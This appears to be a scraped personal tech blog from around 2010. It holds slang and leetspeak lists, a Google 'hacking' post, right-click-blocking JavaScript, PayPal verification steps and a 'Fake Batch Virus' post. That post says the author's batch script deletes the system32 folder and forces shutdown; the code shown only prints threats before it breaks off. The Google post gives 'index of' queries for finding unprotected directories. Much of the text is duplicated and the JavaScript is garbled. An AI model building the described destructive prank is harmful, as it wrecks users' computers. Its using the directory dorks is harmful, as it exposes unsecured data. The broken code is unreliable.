ims - I'm sorry
in4ml - informal
inmp - it's not my problem
inpo - in no particular order
INNW - if not now, when?
ioh - I'm outta here
iss - I said so
istm - it seems to me
istr - I seem to remember(recall)
iswym - I see what you mean
itm - in the money
ium - if you must
iyss - if you say so
j/c - just checking
j/w - just wondering
jad - just another day
jam - just a minute
joo or j00 - you
k - ok
kbd - keyboard
kewl or kool - cool
kfy - kiss for you
kir - keep it real
kiss - keep it simple, stupid
kk - ok
kma - kiss my a**
kok - knock
kotc - kiss on the cheek
kotl - kiss on the lips
kthx - ok, thanks
kwim - know what I mean
kthxbai - ok, thanks, bye
kthxbye - ok, thanks, bye
kutgw - keep up the good work
kypo - keep your pants on
l8 - late
laf or laff - laugh
laq - lame a** quote
lil - little
lola - laugh out loud again
ltic - laugh til I cry
lul or lulz - lol
luv - love
m - am
mai - my
mfd - multi function device
mhbfy - my heart bleeds for you
mhoty - my hats off to you
mite - might
mkop - my kind of place
mmk - ok
moar - more
mof - matter of fact
moos - members of the opposite sex
moss - members of the same sex
mte - my thoughts exactly
mubar - messed up beyond all recognition
mwbrl - more will be revealed later
n - and or in
n/t - no text
n2m - not to mention
nagi - not a good idea
naz - name, address, zip
ncg - new college graduate
ne1 - anyone
nething - anything
ng - new game
nim - no internal message
nimby - not in my backyard
nimq - not in my queue
nmp - not my problem
no1 - no-one
noyb - none of your business
nrg - energy
ntk - nice to know
ntn - nothing
ntymi - now that you mention it
nw - no way!
o - oh
oaus - on a unrelated subject
oars - oh no, not again
obtw - oh by the way
oll - online love
omdb - over my dead body
omik - open mouth, insert keyboard
ootb - out of the blue
ot - off topic
ott - over the top
ottomy - off the top of my head
ousu - oh you, shut up
owtte - or words to that effect
p&c - private and confidential
pans - pretty awesome new stuff
pcm - please call me
pdq - pretty darn quick
pd - public domain
pimp - peeing in my pants
pita - pain in the a**
pls - please
plz - please
pmfji - pardon me for jumping in
po - piss off
poof - good bye
ppl or peeps - people
ptl - praise the lord
pza - pizza
ql - quit laughing
r - are
r&d - research and development
r&r - rest and relaxation
rbay - right back at ya
rbtl - read between the lines
re - regarding
rfd - request for discussion
rite - right
rlf - real life friend
rlh - run like hell
rmlb - read my lips baby
rn - right now
rsn - real soon now
rtfaq - read the faq file
rtk - return to keyboard
ruok - are you ok?
ruup4it - are you up for it?
ryo - roll your own
s or - smile
scnr - sorry, could not resist
sep - someone elses problem
sez - says
sfete - smiling from ear to ear
sh - sh** happens
sitd - still in the dark
slirk - smart little rich kid
smaim - send me an instant message
sme - subject matter expert
smem - send me email
snafu - situation normal, all f***ed up
so - significant other
sok - it's ok
sol - sh** out of luck
some1 - someone
sop - standard operating procedure
sorg - straight or gay
soz - sorry
spk - speak
srlsy - Seriously
sro - standing room only
sry - sorry
ssdd - same sh** different day
str8 - straight
stra - stray
stys - speak to ya soon
sum - some
sum1 - someone
suyf - shut up you fool
sux, sux0r - suck
swak - sealed with a kiss
swdyt - so what do you think
tafn - that is all for now
tah - take a hike
tarfu - things are really f***ed up
tas - taking a shower
tbc - to be continued
tdtm - talk dirty to me
teh - the
tfn - thanks for nothing
thanx - thanks
thnq - thank you
tho - though
thot - thought
thx - thanks
tia - thanks in advance
tiail - think I am in love
tic - tongue in cheek
tlgo - the list goes on
tm - trust me
tna - temporarily not available
tom - tomorrow
tot - tons of time
tp - team player
tptb - the powers that be
ttg - time to go
ttly - totally
ttt - that's the ticket
tvm - thank you very much
twimc - to whom it may concern
u - you
u2 - you too?
uok - are you ok?
ur or ure - your or you're
usu - usually
uve - you've
vbg - very big grin
vbs - very big smile
vm - voice mail
vrbs - virtual reality bull sh**
vsf - very sad face
wad - without a doubt
wai - what an idiot
wan2 - want to
wanna - want to
w/o - without
w84m - wait for me
wat - what
wc - who cares
wdys - what did you say
wdyt - what do you think
wf - way fun
wfm - wait for me, works for me
wiifm - what's in it for me
wknd - weekend
wn - when
wog - wise old guy
wrt - with regards to, or with respect to
wt - without thinking
wtsds - where the sun don't shine
wu - what up?
wut - what
wwy - where were you?
wycm - will you call me?
wyp - what's your problem?
wyrn - what's your real name?
wys - whatever you say
wyt - whatever you think
wywh - wish you were here
x-i-10 - exciting
xlnt - excellent
xme - excuse me
y - why
ya - yet another
yafiygi - you asked for it you got it
ydkm - you don't know me
ygbk - you gotta be kidding
yhm - you have mail
yic - yours in Christ
ykw - you know what
YM - you mean
ynk - you never know
yr - your, yeah right
yoyo - you're on your own
ysyd - yeah, sure you do
yttt - you telling the truth?
yup - Yes
yur - your or you're
yyssw - yeah, yeah, sure sure whatever
zzz - sleeping, tired, bored
For those wanna B hackers, here R some alphabets that hackers use
a - 4
b - 8
c - ( or k or |< or /<
d - <|
e - 3
f - ph
g - 6 or 9
h - |-|
i - 1 or |
k - |< or /<
l - | or 1
m - |\/|
n - |\|
o - 0
p - |2
s - 5
t - 7 or +
u - |_|
v - / or \/
w - // or \/\/
x - ><
y - '/
z - 2
So, go ahead.
Now apart from these common slangs there R many others that many of us don't know about. So here is a short list of slangs that I found on D net.
@ - at
@teotd - at the end of the day
1 - one or won
14aa41 - one for all and all for one
2 - to, too, or two
2b or not 2b - to be or not to be
2dA - today
3sum - threesome
4 - for, four, or the prefix or suffix: fore)
411 - information
4ever - forever
86 - out of, or over
aaaaa - American association against acronym abuse
aaf - as a friend
aak - asleep at keyboard
aamoi - as a matter of interest
aar, aar8 - at any rate
aas - alive and smiling
aatk - always at the keyboard
aayf - as always, your friend
ab - ass backwards
abithiwtidb - a bird in the hand is worth two in the bush
abt2 - about to
acd - alt control delete
ace - access control entry
ack - acknowledgement
adad - another day, another dollar
adbb - all done bye bye
adih - another day in hell
adip - another day in paradise
afagay - a friend as good as you
afahmasp - a fool and his money are soon parted
afaic - as far as I'm concerned
afaiu - as far as I understand
afap - as far as possible
afayc - as far as your concerned
afc - away from computer
afdn - any f***ing day now
afiaa - as far as I am aware
afiniafi - a friend in need is a friend indeed
afz - acronym free zone
agkwe - and God knows what else
aiamu - and I'm a monkey's uncle
aih - as it happens
aimb - as I mentioned before
aimp - always in my prayers
aise - as I said earlier
aisi - as I see it
alol - actually laughing out loud
alot or allot - a lot
altg - act locally, think globally
amap - as many as possible
ambw - all my best wishes
aml - all my love
and - any day now
anfawfows - and now a word from our web sponsor
aoas - all of a sudden
aob - abuse of bandwidth
asafp - as soon as freakin possible
aslmh - age,sex,location,music,hobbies
atb - all the best
atst - at the same time
atw - all the web, or around the web
ayk - as you know
aysos - are you stupid or something
aytmtb - and you're telling me this because?
b - be, bee
b/c - because
b4u - before you
b4uki - before you know it
bag - busting a gut
bai - bye
bak - back at my keyboard
bau - business as usual
bb - bye-bye
bb4n, bbfn - bye bye for now
bbbg - bye bye, be good
bbias - be back in a sec
bbiaw - be back in a while
bbn - bye bye now
bbsd - be back soon darling
bbsl - be back sooner or later
bbt - be back tomorrow
bc - because
bcoz - because
bdn - big d**n number
bf - boyfriend
bfd - big f***ing deal
bg - big grin
bif - before I forget
bion - believe it or not
bioyn - blow it out your nose
bitd - back in the day
bk - big kiss
bka - better known as
bm - bite me
bmota - bite me on the ass
bohica - bend over, here it comes again
bout - about
br - bathroom
brt - be right there
bs - big smile, bull sh**
btdt - been there done that
bthoom - beats the heck out of me
btsoom - beats the sh** out of me
btwbo - be there with bells on
bw - best wishes
bwd - backward
bwdik - but what do I know
by - busy
bykt - but you knew that
c-p - sleepy
c-t - city
c - see
'cause - because
cb - call back, chat brat
cfv - call for vote
cid - consider it done
cmiw - correct me if I'm wrong
cos, coz - because
craft - can't remember a f***ing thing
crat - can't remember a thing
csl - can't stop laughing
cul, cul8r - see you later
cus - because
cuz or cuzz - because
cwyl - chat with you later
cyt - see you tomorrow
da - the
dat - that
deti - don't even think it
df - dear friend
dga - don't go away (or anywhere)
dgara - don't give a rat's a**
dgt - don't go there
dhyb - don't hold your breath
diaf - die in a fire
diku - do I know you?
dis - this
dkdc - don't know, don't care
dltm - don't lie to me
dnc - does not compute
doin - doing
dos - those
dqydj - don't quit your day job
drib - don't read if busy
dunno - don't know
dust - did you see that?
duz - does
duznt - doesn't
dyjhiw - don't you just hate it when...
dyofdw - do your own f***ing dirty work
dystsott - did you see the size of that thing?
e123 - easy as 123
eak - eating at the keyboard
em - them, excuse me
eso - equipment smarter than operator
evar - ever
ewi - emailing while intoxicated
ez - easy
faql - frequently asked questions list
fav - favorite
fawc - for anyone who cares
fe - fatal error
fitb - fill in the blanks
fo - f*** off
foc - free of charge
foe - for
fofl - falling on floor laughing
ftasb - faster than a speeding bullet
fttb - for the time being
fwd - forward
fya - for your amusement
g or
ga - go ahead
gbh - great big hug
ggn - gotta go now
go2 - go to
gok - God only knows
gonna - going to
gth - go to hell
gtsy - good to see you
gud - good
h2 - how to
hagd - have a good day
hai - hi
hhoj - ha ha, only joking
hhtyay - happy holidays to you and yours
hih - hope it helps
hlp - help
hua - heads up ace
hugz - hugs
huh - have you heard
huya - head up your a**
i1dr - I wonder
iae - in any event
ianac - I am not a crook
ianae - I am not an expert
iat - I am tired
ibrb - I'll be right back
ibt - in between technology
ibtd - I beg to differ
icbw - I could be wrong
iccl - I couldn't care less
idgaf - I dont' give a f***
idgi - I don't get it
idky - I don't know you
idl - ideal
idm - it doesn't matter
idst - I didn't say that
idts - I don't think so
ifu - I f***ed up
igtp - I get the point
ihaim - I have another instant message
ihno - I have no opinion
iimad - if it makes a difference
iir - if I remember
iiwm - if it were me
ik - I know
imnsho - in my not so humble opinion
ims - I'm sorry
in4ml - informal
inmp - it's not my problem
inpo - in no particular order
INNW - if not now, when?
ioh - I'm outta here
iss - I said so
istm - it seems to me
istr - I seem to remember(recall)
iswym - I see what you mean
itm - in the money
ium - if you must
iyss - if you say so
j/c - just checking
j/w - just wondering
jad - just another day
jam - just a minute
joo or j00 - you
k - ok
kbd - keyboard
kewl or kool - cool
kfy - kiss for you
kir - keep it real
kiss - keep it simple, stupid
kk - ok
kma - kiss my a**
kok - knock
kotc - kiss on the cheek
kotl - kiss on the lips
kthx - ok, thanks
kwim - know what I mean
kthxbai - ok, thanks, bye
kthxbye - ok, thanks, bye
kutgw - keep up the good work
kypo - keep your pants on
l8 - late
laf or laff - laugh
laq - lame a** quote
lil - little
lola - laugh out loud again
ltic - laugh til I cry
lul or lulz - lol
luv - love
m - am
mai - my
mfd - multi function device
mhbfy - my heart bleeds for you
mhoty - my hats off to you
mite - might
mkop - my kind of place
mmk - ok
moar - more
mof - matter of fact
moos - members of the opposite sex
moss - members of the same sex
mte - my thoughts exactly
mubar - messed up beyond all recognition
mwbrl - more will be revealed later
n - and or in
n/t - no text
n2m - not to mention
nagi - not a good idea
naz - name, address, zip
ncg - new college graduate
ne1 - anyone
nething - anything
ng - new game
nim - no internal message
nimby - not in my backyard
nimq - not in my queue
nmp - not my problem
no1 - no-one
noyb - none of your business
nrg - energy
ntk - nice to know
ntn - nothing
ntymi - now that you mention it
nw - no way!
o - oh
oaus - on a unrelated subject
oars - oh no, not again
obtw - oh by the way
oll - online love
omdb - over my dead body
omik - open mouth, insert keyboard
ootb - out of the blue
ot - off topic
ott - over the top
ottomy - off the top of my head
ousu - oh you, shut up
owtte - or words to that effect
p&c - private and confidential
pans - pretty awesome new stuff
pcm - please call me
pdq - pretty darn quick
pd - public domain
pimp - peeing in my pants
pita - pain in the a**
pls - please
plz - please
pmfji - pardon me for jumping in
po - piss off
poof - good bye
ppl or peeps - people
ptl - praise the lord
pza - pizza
ql - quit laughing
r - are
r&d - research and development
r&r - rest and relaxation
rbay - right back at ya
rbtl - read between the lines
re - regarding
rfd - request for discussion
rite - right
rlf - real life friend
rlh - run like hell
rmlb - read my lips baby
rn - right now
rsn - real soon now
rtfaq - read the faq file
rtk - return to keyboard
ruok - are you ok?
ruup4it - are you up for it?
ryo - roll your own
s or - smile
scnr - sorry, could not resist
sep - someone elses problem
sez - says
sfete - smiling from ear to ear
sh - sh** happens
sitd - still in the dark
slirk - smart little rich kid
smaim - send me an instant message
sme - subject matter expert
smem - send me email
snafu - situation normal, all f***ed up
so - significant other
sok - it's ok
sol - sh** out of luck
some1 - someone
sop - standard operating procedure
sorg - straight or gay
soz - sorry
spk - speak
srlsy - Seriously
sro - standing room only
sry - sorry
ssdd - same sh** different day
str8 - straight
stra - stray
stys - speak to ya soon
sum - some
sum1 - someone
suyf - shut up you fool
sux, sux0r - suck
swak - sealed with a kiss
swdyt - so what do you think
tafn - that is all for now
tah - take a hike
tarfu - things are really f***ed up
tas - taking a shower
tbc - to be continued
tdtm - talk dirty to me
teh - the
tfn - thanks for nothing
thanx - thanks
thnq - thank you
tho - though
thot - thought
thx - thanks
tia - thanks in advance
tiail - think I am in love
tic - tongue in cheek
tlgo - the list goes on
tm - trust me
tna - temporarily not available
tom - tomorrow
tot - tons of time
tp - team player
tptb - the powers that be
ttg - time to go
ttly - totally
ttt - that's the ticket
tvm - thank you very much
twimc - to whom it may concern
u - you
u2 - you too?
uok - are you ok?
ur or ure - your or you're
usu - usually
uve - you've
vbg - very big grin
vbs - very big smile
vm - voice mail
vrbs - virtual reality bull sh**
vsf - very sad face
wad - without a doubt
wai - what an idiot
wan2 - want to
wanna - want to
w/o - without
w84m - wait for me
wat - what
wc - who cares
wdys - what did you say
wdyt - what do you think
wf - way fun
wfm - wait for me, works for me
wiifm - what's in it for me
wknd - weekend
wn - when
wog - wise old guy
wrt - with regards to, or with respect to
wt - without thinking
wtsds - where the sun don't shine
wu - what up?
wut - what
wwy - where were you?
wycm - will you call me?
wyp - what's your problem?
wyrn - what's your real name?
wys - whatever you say
wyt - whatever you think
wywh - wish you were here
x-i-10 - exciting
xlnt - excellent
xme - excuse me
y - why
ya - yet another
yafiygi - you asked for it you got it
ydkm - you don't know me
ygbk - you gotta be kidding
yhm - you have mail
yic - yours in Christ
ykw - you know what
YM - you mean
ynk - you never know
yr - your, yeah right
yoyo - you're on your own
ysyd - yeah, sure you do
yttt - you telling the truth?
yup - Yes
yur - your or you're
yyssw - yeah, yeah, sure sure whatever
zzz - sleeping, tired, bored
For those wanna B hackers, here R some alphabets that hackers use
a - 4
b - 8
c - ( or k or |< or /<
d - <|
e - 3
f - ph
g - 6 or 9
h - |-|
i - 1 or |
k - |< or /<
l - | or 1
m - |\/|
n - |\|
o - 0
p - |2
s - 5
t - 7 or +
u - |_|
v - / or \/
w - // or \/\/
x - ><
y - '/
z - 2
So, go ahead.
Thursday, April 15, 2010
11 Rules U don't learn in schools
Rule 1: Life is not fair - get used to it!
Rule 2: The world won't care about your self-esteem. The world will expect you to accomplish something BEFORE you feel good about yourself.
Rule 3: You will NOT make $60,000 a year right out of high school. You won't be a vice president with a car phone until you earn both.
Rule 4: If you think your teacher is tough, wait till you get a boss.
Rule 5: Flipping burgers is not beneath your dignity. Your grandparents had a different word for burger flipping: they called it opportunity.
Rule 6: If you mess up, it's not your parents' fault; so don't whine about your mistakes, learn from them.
Rule 7: Before you were born, your parents weren't as boring as they are now. They got that way from paying your bills, cleaning your clothes and listening to you talk about how cool you thought you were. So before you save the rain forest from the parasites of your parent's generation, try delousing the closet in your own room.
Rule 8: Your school may have done away with winners and losers, but life HAS NOT. In some schools, they have abolished failing grades and they'll give you as MANY TIMES as you want to get the right answer. This doesn't bear the slightest resemblance to ANYTHING in real life.
Rule 9: Life is not divided into semesters. You don't get summers off and very few employers are interested in helping you "FIND YOURSELF". Do that on your own time.
Rule 10: Television and video games are NOT real life. In real life people actually have to leave the coffee shop and go to jobs.
Rule 11: Be nice to nerds. Chances are you'll end up working for one.
Rule 2: The world won't care about your self-esteem. The world will expect you to accomplish something BEFORE you feel good about yourself.
Rule 3: You will NOT make $60,000 a year right out of high school. You won't be a vice president with a car phone until you earn both.
Rule 4: If you think your teacher is tough, wait till you get a boss.
Rule 5: Flipping burgers is not beneath your dignity. Your grandparents had a different word for burger flipping: they called it opportunity.
Rule 6: If you mess up, it's not your parents' fault; so don't whine about your mistakes, learn from them.
Rule 7: Before you were born, your parents weren't as boring as they are now. They got that way from paying your bills, cleaning your clothes and listening to you talk about how cool you thought you were. So before you save the rain forest from the parasites of your parent's generation, try delousing the closet in your own room.
Rule 8: Your school may have done away with winners and losers, but life HAS NOT. In some schools, they have abolished failing grades and they'll give you as MANY TIMES as you want to get the right answer. This doesn't bear the slightest resemblance to ANYTHING in real life.
Rule 9: Life is not divided into semesters. You don't get summers off and very few employers are interested in helping you "FIND YOURSELF". Do that on your own time.
Rule 10: Television and video games are NOT real life. In real life people actually have to leave the coffee shop and go to jobs.
Rule 11: Be nice to nerds. Chances are you'll end up working for one.
Tuesday, April 6, 2010
Name Google
If U want 2 make a site with your own domain name 4 free then here is something that is not D real deal but is some fun. is a site powered by Google Custom Search, that allows U 2 not only create a page with your name in D Google style but also lets U save them with D url of your choice 4 free.
But it works by editing your host file so it wont work on other computers, but it is still fun right?
Sued for using Facebook
Yeah U read it. A dude is being sued for creating a Facebook Group. Dude's name is
Christopher Thomas Aldred (or Thomas Aldred) a student of St Columbia College and D name of his group is St Columba College Is a Shit Hole!. So not guessing who R sued him :D.
Now he is scrambling 2 close his group B 4 he gets in jail. He is requesting all 63 members to leave D group, so that he can close it. Not things like this shows us that we may use D internet 2 say all that we want, but we must always think B 4 as you might not know who is reading it.
Now if U wanna C this Facebook Group than I suggest U do it soon. As it will B closed.
Christopher Thomas Aldred (or Thomas Aldred) a student of St Columbia College and D name of his group is St Columba College Is a Shit Hole!. So not guessing who R sued him :D.
Now he is scrambling 2 close his group B 4 he gets in jail. He is requesting all 63 members to leave D group, so that he can close it. Not things like this shows us that we may use D internet 2 say all that we want, but we must always think B 4 as you might not know who is reading it.
Now if U wanna C this Facebook Group than I suggest U do it soon. As it will B closed.
Friday, April 2, 2010
Creating Special Characters in Plain Text
We use special characters like © & ™ & ® on our sites & blogs, but it is easy 2 put them via HTML codes like © for ©, ® for ® & ™ for ™.
But when it comes to plain text it is quite difficult. MS Word automatically changes (c) to ©, but U cannot do that in say Notepad. So what can U do?
Well D solution is simple & all U need is a computer with a keyboard.
Just Hold D ALT key on your keyboard & type 0169 on your Numpad (not the numbers on D top of your alphabetic keys). You'll get a © symbol in Notepad, not only that but it works on any plain text editor, even here.
There R lots of special characters linked 2 key combinations, but here is a list of few of those important symbols that U might need,
Alt 0169 © (copyright)
Alt 0153 ™ (Trade Mark)
Alt 0174 ® (Registered)
Alt 0167 § (Section)
Alt 0178 ² (squared)
Alt 0162 ¢ (cents)
Alt 0128 € (Euro)
Alt 0163 £ (Pound)
Alt 0165 ¥ (Yen)
Alt 0161 ¡ (inverted exclamation)
Alt 0191 ¿ (inverted question mark)
Alt 0172 ¬ (boolean 'not')
Alt 0176 ° (the degree sign)
If U want then U can also create special symbols just 4 U, like a logo of your company or your initials or digital signature that U can place anywhere without any hustle. All U have 2 do is,
In D Run Command, Type eudcedit > Hit OK.
Private Character Editor will B launched, you'll see a Select Code dialog box > Hit OK.
U will see something like Paint, just create a symbol that U want and select Save Character from
Edit menu.
Your symbol is made.
To add that symbol just open Run Command, Type charmap > Hit OK.
When Character Map opens, select the Font drop-down list and select All Fonts (Private
Select your character, click the Select button, and then click the Copy button.
You can now paste your font character in any document that you want.
But when it comes to plain text it is quite difficult. MS Word automatically changes (c) to ©, but U cannot do that in say Notepad. So what can U do?
Well D solution is simple & all U need is a computer with a keyboard.
Just Hold D ALT key on your keyboard & type 0169 on your Numpad (not the numbers on D top of your alphabetic keys). You'll get a © symbol in Notepad, not only that but it works on any plain text editor, even here.
There R lots of special characters linked 2 key combinations, but here is a list of few of those important symbols that U might need,
Alt 0169 © (copyright)
Alt 0153 ™ (Trade Mark)
Alt 0174 ® (Registered)
Alt 0167 § (Section)
Alt 0178 ² (squared)
Alt 0162 ¢ (cents)
Alt 0128 € (Euro)
Alt 0163 £ (Pound)
Alt 0165 ¥ (Yen)
Alt 0161 ¡ (inverted exclamation)
Alt 0191 ¿ (inverted question mark)
Alt 0172 ¬ (boolean 'not')
Alt 0176 ° (the degree sign)
If U want then U can also create special symbols just 4 U, like a logo of your company or your initials or digital signature that U can place anywhere without any hustle. All U have 2 do is,
In D Run Command, Type eudcedit > Hit OK.
Private Character Editor will B launched, you'll see a Select Code dialog box > Hit OK.
U will see something like Paint, just create a symbol that U want and select Save Character from
Edit menu.
Your symbol is made.
To add that symbol just open Run Command, Type charmap > Hit OK.
When Character Map opens, select the Font drop-down list and select All Fonts (Private
Select your character, click the Select button, and then click the Copy button.
You can now paste your font character in any document that you want.
Monday, March 29, 2010
Unselectable text script with hack for Chrome
Now I don't know if it is useful 4 U or not, but it'll B an eye catcher 4 sure. Many people R paranoid that what they put on their site will B copied by others. Now U can always add a script 2 block right-click like this one,
function disableRightClick(e){
var message = "Right click disabled";
if(!document.rightClickDisabled) // initialize
document.onmousedown = disableRightClick;}
else document.oncontextmenu = disableRightClick;
return document.rightClickDisabled = true;}
if(document.layers || (document.getElementById && !document.all)){
if (e.which==2||e.which==3){
return false;}}
return false;}}
Now, this takes care of right-clicks, but if U want 2 go ahead with this then try this. Copy & paste this code in a .js file, this will stop users from selecting any text or image from your web page.
Links will not B affected. Here is D code,
var Unselectable = {
enable : function(e) {
var e = e ? e : window.event;
if (e.button !=1) {
if ( {
var targer =;
} else if (e.srcElement) {
var targer = e.srcElement;
var targetTag = targer.tagName.toLowerCase();
if ((targetTag != "input") && (targetTag != "textarea")){
return false;
disable : function () {
return true;
if (typeof(document.onselectstart) != "undefined") {
document.onselectstart = Unselectable.enable;
} else {document.onmousedown = Unselectable.enable;
document.onmouseup = Unselectable.disable;}
Done now link it with any page & it'll B unselectable.
P.S.- Don't know Y but it doesn't works in Chrome. So I found a hack that works in Chrome.
Just add this code D body tag,
<body ondragstart="return false" onselectstart="return false">
Hope it helps U.
function disableRightClick(e){
var message = "Right click disabled";
if(!document.rightClickDisabled) // initialize
document.onmousedown = disableRightClick;}
else document.oncontextmenu = disableRightClick;
return document.rightClickDisabled = true;}
if(document.layers || (document.getElementById && !document.all)){
if (e.which==2||e.which==3){
return false;}}
return false;}}
Now, this takes care of right-clicks, but if U want 2 go ahead with this then try this. Copy & paste this code in a .js file, this will stop users from selecting any text or image from your web page.
Links will not B affected. Here is D code,
var Unselectable = {
enable : function(e) {
var e = e ? e : window.event;
if (e.button !=1) {
if ( {
var targer =;
} else if (e.srcElement) {
var targer = e.srcElement;
var targetTag = targer.tagName.toLowerCase();
if ((targetTag != "input") && (targetTag != "textarea")){
return false;
disable : function () {
return true;
if (typeof(document.onselectstart) != "undefined") {
document.onselectstart = Unselectable.enable;
} else {document.onmousedown = Unselectable.enable;
document.onmouseup = Unselectable.disable;}
Done now link it with any page & it'll B unselectable.
P.S.- Don't know Y but it doesn't works in Chrome. So I found a hack that works in Chrome.
Just add this code D body tag,
<body ondragstart="return false" onselectstart="return false">
Hope it helps U.
Sunday, March 28, 2010
Google Hacking Tricks Part-I
Google™ Hacking or whatever it is called is actually nothing but using some specific keywords 2 get a more desired results. There R lots of keywords & placing them here is not a small thing. So let's start with a few common words that might B helpful 2 U.
Type intext:your keyword. Google™ will search only text containing your keyword within D site ignoring D links, title & url.
Type intitle:my site. Google™ will search only 4 D sites containing D title my site.
U can also add variations 2 this search by typing, intitle:my intitle:site. This will search site whose title contain either my or site.
Also type allintitle:my site, this will force Google™ 2 search sites whose title contain both D words in D same order.
To find a specific file format e.g.- .doc or .pdf, type keyword filetype:doc. Google™ will find word documents with D name keyword.
If U want 2 search a single web page then type my keyword.
U can also just search D domain name by typing
site:com keyword
site:org keyword
site:net keyword
site:tv keyword
Here R a few examples of using more than one hack
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size
This will give U a list of unprotected directories
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +"Kareena Kapoor"
This will give U probably a list of Kareena Kapoor pics & stuff.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wmv|avi)
This will give U a list of wmv & avi files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3)
This will give a list of wma & mp3 audio files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(jpg|gif)
Jpeg & gif image file list.
Like type, -inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) +"In the End", will give U a list of songs with title "In the End".
U can also do maths in Google™ (I wish I knew it when my exams were going). Just type D following in Google search & hit enter.
sine(30 degrees) - Finds D sin of 30 degrees.
2^20 - Finds 2 to D power of 20 (Don't know what that is)
sqrt(2870 - Finds D Square root of 287.
Here R D list of mathematical signs that Google™ recognizes & can B used.
+ For addition
- For subtraction
* For multiplication
/ For division
^ For exponential (x to the power of y)
% For modulo (finding the remainder after division)
U can convert one unit 2 other in Google™. Type,
5 oz in cup - Finds 5 ounces in 1 cup.
12 parsecs in feet - Finds 12 parsecs in 1 foot.
37 degrees in Fahrenheit - Converts 37 degrees to Fahrenheit.
Last but not least U can also use Google™ 2 find D meaning of a word by typing, define:word
There R more Google™ hacks but rest of them I'll post later.
Type intext:your keyword. Google™ will search only text containing your keyword within D site ignoring D links, title & url.
Type intitle:my site. Google™ will search only 4 D sites containing D title my site.
U can also add variations 2 this search by typing, intitle:my intitle:site. This will search site whose title contain either my or site.
Also type allintitle:my site, this will force Google™ 2 search sites whose title contain both D words in D same order.
To find a specific file format e.g.- .doc or .pdf, type keyword filetype:doc. Google™ will find word documents with D name keyword.
If U want 2 search a single web page then type my keyword.
U can also just search D domain name by typing
site:com keyword
site:org keyword
site:net keyword
site:tv keyword
Here R a few examples of using more than one hack
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size
This will give U a list of unprotected directories
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +"Kareena Kapoor"
This will give U probably a list of Kareena Kapoor pics & stuff.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wmv|avi)
This will give U a list of wmv & avi files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3)
This will give a list of wma & mp3 audio files.
-inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(jpg|gif)
Jpeg & gif image file list.
Like type, -inurl(html|htm|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) +"In the End", will give U a list of songs with title "In the End".
U can also do maths in Google™ (I wish I knew it when my exams were going). Just type D following in Google search & hit enter.
sine(30 degrees) - Finds D sin of 30 degrees.
2^20 - Finds 2 to D power of 20 (Don't know what that is)
sqrt(2870 - Finds D Square root of 287.
Here R D list of mathematical signs that Google™ recognizes & can B used.
+ For addition
- For subtraction
* For multiplication
/ For division
^ For exponential (x to the power of y)
% For modulo (finding the remainder after division)
U can convert one unit 2 other in Google™. Type,
5 oz in cup - Finds 5 ounces in 1 cup.
12 parsecs in feet - Finds 12 parsecs in 1 foot.
37 degrees in Fahrenheit - Converts 37 degrees to Fahrenheit.
Last but not least U can also use Google™ 2 find D meaning of a word by typing, define:word
There R more Google™ hacks but rest of them I'll post later.
Friday, March 26, 2010
Verify your Paypal account by a Paypal Plus Credit card
In this post I'll tell U how 2 verify your Paypal account by applying 4 a Paypal Plus Credit card.
U might also want 2 read my previous post on how 2 verify your Paypal™ account by Bank account.
U might also want 2 read my previous post on how 2 verify your Paypal™ account by Bank account.
- Scroll down on your Paypal™ Account page
- Click on "Plus Card" link. U'll B take 2 D "Paypal™ Plus Credit Card" page
- Click on D "Apply Now" button.
- Fill in D application form. Most of D information R those that Paypal™ already has
- If U want 2 enter D Account Security Program then check D box by it side. Then read D "Terms & Conditions".
- Hit D "Accept and Submit" button. In 1 minute paypal™ will inform U if U R approved or not. If U R approved then your account will automatically B verified.
Verify your Paypal account by Bank account.
Today a friend of mine asked me about verifying Paypal™ account. Now if your account is verified then U have no limit on how much U transfer & U can assure your users that all transactions that they made R valid & safe.
U can verify your Paypal™ account by your Bank account.
U can also verify your Paypal™ account using Paypal™ Plus Credit card.
U can verify your Paypal™ account by your Bank account.
- Login In your PayPal™ account. U'll B at "My Account Overview" page.
- Find "Activate Account" heading & click on "Add Bank Account". U can also add a Bank account on "Profile Summary" page by clicking on "Bank Accounts" in the "Financial Information" column
- Enter your bank account details e.g.- bank name, branch code, your account number, etc, hit continue.
- Paypal™ offers 2 methods to verify your account.
- If your bank offers online banking then enter your online banking information. Paypal™ will check with D bank to verify your account instantly.
- Second method is Paypal™ will deposit 2 small deposits in your bank account. Check your bank statements for those Paypal™ deposits. Click on "Confirm Bank Account" link on your "Account Summary" page, then enter the amounts of D deposits.
U can also verify your Paypal™ account using Paypal™ Plus Credit card.
Tuesday, March 23, 2010
Fake Batch Virus
I've seen lots of fake viruses, some R nice some are good, but this one that I made is better than others.
Now it does nothing much it only opens command prompt and asks U 2 hit a key when U hit a key it starts showing a message that it is a virus and it'll delete all your files, D usual stuff.
Then it appears that D computer is scanning 4 D virus and it deletes D system32 folder and then your computer can't reboot and it shuts down. There is a code that creates a shutdown countdown at D end.
So Here's D code
@echo off
rem Batch Attack v1.0
rem Created By Tanmay Das
title Command Prompt
@ping -n 2 -w 1000 > nul
@ping -n %1% -w 1000> nul
color 04
title Mad Hatter v0.1
echo I have something to tell you.
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Actually I'm a virus.....
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo I will delete your files.....
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo COOL RIGHT!!!!
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo So you better say goodbye to all your files!!
@ping -n 3 -w 1000 > nul
@ping -n %1% -w 1000> nul
echo Nothing Personal it's just the way I was made :)
